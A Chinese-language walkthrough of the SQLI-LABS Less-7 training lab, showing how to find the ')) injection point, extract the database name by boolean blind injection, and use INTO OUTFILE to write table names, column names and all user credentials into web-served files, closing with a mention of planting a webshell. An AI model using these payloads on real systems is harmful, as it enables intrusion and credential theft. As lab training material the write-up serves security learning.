SQLI-LABS(Less-7)

Less-7(GET-Dump into outfile-String)

打开Less-7页面，可以看到页面中间有一句Please input the ID as parameter with numeric value，那么先使用ID这个参数通过GET方式传入一个数值。

确定注入点

注入语句：?id=1。可以看出没有回显查询结果。

接着试一下?id=1'，发现出错了，但是并不回显错误。也就是说我们无法从前端得知语法错误，这样就无法确定闭合符号。

接着尝试?id=1"，看到没有页面显示正常，那么SQL语句可能是使用双引号进行闭合的。

使用注入语句：?id=1" --+看看是否能够正常闭合并注释,从下图看出是没有问题的。

接着尝试注入语句?id=1" and 1=1 --+和?id=1" and 1=2 --+,发现注入第一条语句时页面正常，注入第二条语句时居然也是正常的。说明之前的判断有误。

重新尝试常用的闭合语句：

SQL语句原代码：
'$id'
"$id"
('$id')
("$id")
(('id'))

闭合代码：
1' #
1" #
1') #
") #
')) #

最后发现，本关使用的闭合语句为'))，并且?id=1')) --+正常、?id=1')) and 1=1 --+正常、?id=1')) and 1=2 --+错误。由此判断此处存在注入点。

确定数据库名

既然本关是没有查询结果回显也不会显示语法错误信息，只能判断出存在成功和错误两种信息，那么可以考虑使用布尔型盲注，通过前端显示的是成功还是错误信息来判断注入的语句是否正确。

注入语句：?id=1')) and length((select database()))>5 --+，length()函数会返回括号内的字符串长度，例如length('abc')返回3，表示字符串长度为3，这样上述语句就变成了查询当前数据表是否存在id为1并且当前数据库名长度是否大于5，而我们知道当前数据库存在id为1的用户，那么整个注入语句就可以直接用来判断当前数据库名的长度是否大于5。

从上图中可以看出数据库名的长度是大于5的，接着判断是否当前数据库名是否小于10，使用：?id=1')) and length((select database()))<10 --+,通过这种方式最终可以得出，当前数据库名长度为8。

下一步判断数据库名是什么，使用注入语句：?id=1')) and substring((select database()),1,1)<'z' --+判断当前数据库名的第一个字符是否小于z，接着通过二分法不断猜解，得出当前数据库名第一个字符为s，通过此方法最终可以猜解出当前数据库名。接下来的表名、列名、用户名、密码都可以使用此方法猜解得出。

outfile函数

不过根据这关主页的提示，应该使用outfile函数，利用outfile函数在数据库有写权限的目录写入文件。
要使用outfile函数写文件，需要先知道网站的路径,虽然第七关没有回显，但是可以在第一关的回显中使用@@datadir来获取数据库的存储数据路径。
补充：@@datadir获取数据库存储数据路径 ，@@basedir是MYSQL获取安装路径
在第一关使用注入语句：?id=1' and 1=2 union select 1,2,@@datadir --+,拿到了数据的存储路径：/var/lib/mysql/，可以根据路径判断操作系统为Linux，在Linux下默认的网站路径为/var/www/html。（但是这里通过作弊的方式得知SQLI-LABS Less-7靶场的路径为/var/www/sqlilabs/Less-7）

确认当前用户读写权限

MySQL是通过权限表来控制用户对数据库访问的，权限表存放在mysql数据库中，主要的权限表有以下几个：user,db,host,table_priv,columns_priv和procs_priv,通常用户信息、修改用户的密码、删除用户及分配权限等就是在mysql数据库的user表中。(MySQL user表详解)
注入语句：?id=1')) and (select count(*) from mysql.user)>0 --+，如果回显正常，就是表示最高权限。

利用outfile写入文件确定当前数据库名

注入语句：?id=1')) union select 1,2,database() into outfile '/var/www/sqlilabs/Less-7/1.txt' --+

虽然前端页面报错了，但是文件已经写入到/var/www/sqlilabs/Less-7/下，通过URL可以访问：

这样就得到当前数据库名security。

利用outfile写入文件确定当前数据库名

注入语句：?id=1')) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() into outfile '/var/www/sqlilabs/Less-7/2.txt' --+

利用outfile写入文件确定users表中的列名

注入语句：?id=1')) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database() into outfile '/var/www/sqlilabs/Less-7/3.txt' --+

利用outfile写入文件确定users表中的用户名和密码

注入语句：?id=1')) union select 1,group_concat(username),group_concat(password) from users into outfile '/var/www/sqlilabs/Less-7/4.txt' --+

到此，就得到了当前表中所有的用户名和密码。既然可以写入文件，那么可以直接写入一句话木马（后续补充）。